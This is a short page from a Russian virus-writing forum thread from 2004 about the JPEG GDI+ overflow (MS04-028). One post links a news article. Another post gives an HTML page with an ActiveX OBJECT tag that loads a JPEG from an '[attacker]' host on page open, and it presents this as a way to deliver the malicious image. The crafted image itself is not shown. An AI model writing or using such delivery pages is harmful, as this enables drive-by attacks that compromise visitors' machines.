· Начало · Отвђтить · Статистика · Поиск · FAQ · Правила · Установки · Язык · Выход · WASM.RU · Noir.Ru ·

 WASM Phorum —› WASM.VIROLOGY —› JPEG GDI+ overflow (MS04-028)

<< . 1 . 2 .

Посл.отвђт Сообщенiе


Дата: Окт 27, 2004 18:53:21 · Поправил: Stub

http://www.securitylab.ru/48920.html а вот и ссылочка
(ошибся, тут не переполнение... но тоже интересно :)))


Дата: Окт 27, 2004 19:06:01

„Может быть в html нужно не <img src="funny.jpg">, а какой другой тег указывать?“
<HTML>
< HEAD>
< TITLE>Think of something clever!</TITLE>
< /HEAD>
< BODY>
< OBJECT ID="ExploitImage" WIDTH="96" HEIGHT="96"
CLASSID="CLSID:D4A97620-8E8F-11CF-93CD-00AA00C08FDF"
CODEBASE="http://activex.microsoft.com/controls/mspert10.cab">
< PARAM NAME="BorderStyle" VALUE="0">
< PARAM NAME="SizeMode" VALUE="3">
< PARAM NAME="Size" VALUE="2540;2540">
< PARAM NAME="PicturePath" VALUE="http://[attacker]/freeze_system.jpg">
< PARAM NAME="PictureAlignment" VALUE="0">
< PARAM NAME="VariousPropertyBits" VALUE="19">
< /OBJECT>
< /BODY>
< /HTML>


Не плохой способ вставить картинку :), может и jpeg также стоит попробовать вставить?

<< . 1 . 2 .


Powered by miniBB 1.6 © 2001-2002
Время загрузки страницы (сек.): 0.036